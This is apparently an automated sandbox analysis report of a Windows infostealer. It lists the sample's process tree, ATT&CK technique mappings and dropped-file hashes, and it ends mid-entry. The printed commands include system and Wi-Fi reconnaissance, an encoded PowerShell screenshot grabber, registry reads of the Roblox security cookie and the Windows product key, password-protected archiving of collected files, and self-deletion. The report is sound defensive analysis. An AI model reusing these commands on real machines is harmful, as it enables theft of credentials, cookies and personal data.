C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:3988

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:3188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:3456

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:3696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
3⤵
PID:1060

C:\Windows\system32\netsh.exe
netsh wlan show profile
4⤵
PID:4580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
3⤵
PID:4228

C:\Windows\system32\systeminfo.exe
systeminfo
4⤵
- Gathers system information
PID:2404

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
3⤵
PID:4872

C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
4⤵
PID:1780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
3⤵
PID:4236

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2644

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\e41izijv\e41izijv.cmdline"
5⤵
PID:4332

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4EAC.tmp" "c:\Users\Admin\AppData\Local\Temp\e41izijv\CSCD9B7F3E5FC224C90B7EFCEF91897D37.TMP"
6⤵
PID:4276

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:2248

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:5088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
3⤵
PID:1264

C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:2328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:616

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:4072

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
3⤵
PID:2668

C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:3456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:5016

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:3336

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:840

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:1020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:4380

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:1364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:5108

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:1764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
3⤵
PID:1540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
3⤵
PID:5088

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
3⤵
PID:3356

C:\Windows\system32\getmac.exe
getmac
4⤵
PID:1060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI19002\rar.exe a -r -hp"blackexe" "C:\Users\Admin\AppData\Local\Temp\0V88X.zip" *"
3⤵
PID:4516

C:\Users\Admin\AppData\Local\Temp\_MEI19002\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI19002\rar.exe a -r -hp"blackexe" "C:\Users\Admin\AppData\Local\Temp\0V88X.zip" *
4⤵
- Executes dropped EXE
PID:2436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
3⤵
PID:1604

C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
4⤵
PID:1844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
3⤵
PID:3076

C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
4⤵
PID:1368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
3⤵
PID:1608

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
4⤵
PID:3292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
3⤵
PID:2780

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
3⤵
PID:936

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
4⤵
- Detects videocard installed
PID:2056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
3⤵
PID:5108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe""
3⤵
PID:1132

C:\Windows\system32\PING.EXE
ping localhost -n 3
4⤵
- Runs ping.exe
PID:2308

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 87435a6816d2e35bb2bf1e10b095305c VoDv4+jxK0qS4xlvcFxGZg.0.1.0.0.0
1⤵
PID:2904

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
8a472eee36517de6c61ad86cbba675fd

SHA1
4bc55912d71ede8247330d35522ab562ce2b6ffa

SHA256
44501bf07f00f632837f23296dbaf9cdf73818abf14a4688090ea2fb8932028f

SHA512
40c0d2af8e9186c12d7d7d813a46045ea24bf85e03a875a25395899d57026725dd2269c5228302cd34a3e22b9c87e516d8232fec88a740f138873742f11a53de

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ae400162c5ca394a330ec2798e53c3f1

SHA1
af3a93d87a7a792a99ac0075cd17a9802eb5b4b6

SHA256
f3e9d7997043d83fd9a254bd0a70720db11528a2c7c247e40b2a428dc3c86660

SHA512
7a5acede52d6dff8bf451f9706f4e87501a47db9810fa0e94e37b947a03e0b770c14295cfe3428430ef2a18b81fdd9ca81265ba5ed7695dc7bd378e5dd12814c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
88be3bc8a7f90e3953298c0fdbec4d72

SHA1
f4969784ad421cc80ef45608727aacd0f6bf2e4b

SHA256
533c8470b41084e40c5660569ebbdb7496520d449629a235e8053e84025f348a

SHA512
4fce64e2dacddbc03314048fef1ce356ee2647c14733da121c23c65507eeb8d721d6b690ad5463319b364dc4fa95904ad6ab096907f32918e3406ef438a6ef7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES4EAC.tmp

Filesize
1KB

MD5
91350a75e1d0920e3a6ab317e0c606e4

SHA1
503a871775f616ffc2bf11c3273436c11ff8757b

SHA256
15aa7c45bd95bf680e7262fd8d0bf56dae356d7236d321e603847367f59ff178

SHA512
a06c2ad87a9bc1339b58a6b386e5bbbf918b562b0566e589b3dcbf7f2f08756c5f422ff0e51808f0d5a234e1f3c822ca0ac36b65d83e369f1fb6ac07b5c8b5be

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19002\VCRUNTIME140.dll

Filesize
94KB

MD5
a87575e7cf8967e481241f13940ee4f7

SHA1
879098b8a353a39e16c79e6479195d43ce98629e

SHA256
ded5adaa94341e6c62aea03845762591666381dca30eb7c17261dd154121b83e

SHA512
e112f267ae4c9a592d0dd2a19b50187eb13e25f23ded74c2e6ccde458bcdaee99f4e3e0a00baf0e3362167ae7b7fe4f96ecbcd265cc584c1c3a4d1ac316e92f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19002\_bz2.pyd

Filesize
43KB

MD5
52e9fde32cb021eb3fc4c5f4138eeacc

SHA1
33887c44fa0f729120effb64fb39baad3c36e22a

SHA256
7fdfb1e06602983d58a70ab37697dd57e343cfc5b0a0f66a5b3cdc3bffd4a691

SHA512
bcd2c895da624951f6606dbfb27d27941436363e1d05eee498bb94189cadc24d2e3fd5636569129388e06f5cf9be0aa4d8965aff6190338bb06b9572ab8cbee6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19002\_ctypes.pyd

Filesize
54KB

MD5
e1abde07979f598e3f280c59ed50a44b

SHA1
9169944889a0da8f30cff5242e03418a0a060246

SHA256
5eb68a6cb85bc535faa009d984e2b7f99f150c9a7e754deff9321a98e380000b

SHA512
ca0635d91f4568a6684e92101d7c875f49d2592597acaf2696fcba16b776b3a2431382b01de2473567c2c6640a96090d289c2c82a10bea44ed8ee0b912cddab4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19002\_decimal.pyd

Filesize
101KB

MD5
1a2a0e2af5fde9e85636e43e4a73471a

SHA1
f708ce0b3616ab3b29f66ce4800e20c2ec730048

SHA256
7957053a3abe0e2b2239f8df59917343b10c14bb46d33f366ce660380c08c5d3

SHA512
159c093bc947565eaf08cc2b7d3d1d1b9fdb6f6b5fa42413372bed5bd045c18acca0c5774d2ca7e4fdf4180a77ec52fb90f869209fad00cdabe05024c6f22c02

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19002\_hashlib.pyd

Filesize
31KB

MD5
8bc6f365d6db7b8da29e56230f5be575

SHA1
a8a52c11707123ef65028ef4d3d629ef8bc623bc

SHA256
cf717e5f8d83fc1aa3c417f814a77ee0ec83c5dc010a1a39131cb22532e50aee

SHA512
9fe14343b39f58f70fd1f44fe603276b878f40b74fc1f8891fcd3693be017f8393a1f34375cc399204b10a2551664b7a7b244688b56ab98b96688d6baa9962e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19002\_lzma.pyd

Filesize
81KB

MD5
0b4682f21e0cbd58b229c3bf4c87e58e

SHA1
644aafb1511c580819bfc2e4840f9a879590b3ef

SHA256
260c9c9a7b8f0cf7f391d1bca5c9e3eed1d275a2b2a7056c8ef22fea4682e0ab

SHA512
87a1c3a44dd3889ebfc1704b3d9c6a1def067ca113edc57101e9df5bf50a4951aad295eebed75ecd3afd2bc448219373a3d757b22dcf7a00f66150b162a8ec6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19002\_queue.pyd

Filesize
21KB

MD5
5ddf5bc6b73fead41d4df46cc80e5ca5

SHA1
dd856ad90cb93f4764c28f8a9c889e16a65c546a

SHA256
5ca402d9461cb58adc9a5610c906d7c53eb154dce2b9ad3680ed5ad86d2a6d35

SHA512
ac15ce29cc072f4f8031786f750ef86bdbc044f5d89df57979cf97efc6c021cb86a86a98b5939f56e9d6f71f7d6862d5b9af0d6a0a6a404d042ba0ce061c5fa1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19002\_socket.pyd

Filesize
38KB

MD5
65003f3d63e947ec96c9a2c519a93f1d

SHA1
1ee3c9fd90eb3e1415d0ac798175e46dba684c80

SHA256
754e05d4bdd623096826e21f1212cf82f5bcfeff5aeb9fadec94afd36f304de3

SHA512
94003881ea7734e8d349c08c2320299bddb49e954f808e032903c34ab7031ba479c940625a90475f826f2c3c67e8b106b647b20bd5a6f0ce03003b1d26cc4a90

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19002\_sqlite3.pyd

Filesize
45KB

MD5
1e87bcfbf181171e2a364a8ab029a0e3

SHA1
c7c70521d6f265d78815a652d521c8286b39fb0c

SHA256
38874a6e05327d61bd6b76094a4596c4382018cab93c95beecfc8ced62b814dd

SHA512
7df08363f70e89bbf7bf8eacb6fac4676cc327432031be97018bf0813c2bcf2503c1a515fbcae49d934259eeb98753f27a46aa93bae65b6f07fa4de8db11a77a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19002\_ssl.pyd

Filesize
58KB

MD5
6890cf4a41154fd5eb741aab2f871abe

SHA1
99a13272975913959bb6f558009172f328840809

SHA256
f5da1fdb25fbd540e22c9a9cb037a6586f5500407b7ab2202c01a85e7ffc60c7

SHA512
1ffde8bf417fba246de4c8384fc6e0a84eeb2a2a36e76d26bd76218653e3a452be7ac0a6f41b4d20c58c7b5b640d41ad7f1bb9f7eaebf54b7d893c9b1c595b94

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19002\base_library.zip

Filesize
858KB

MD5
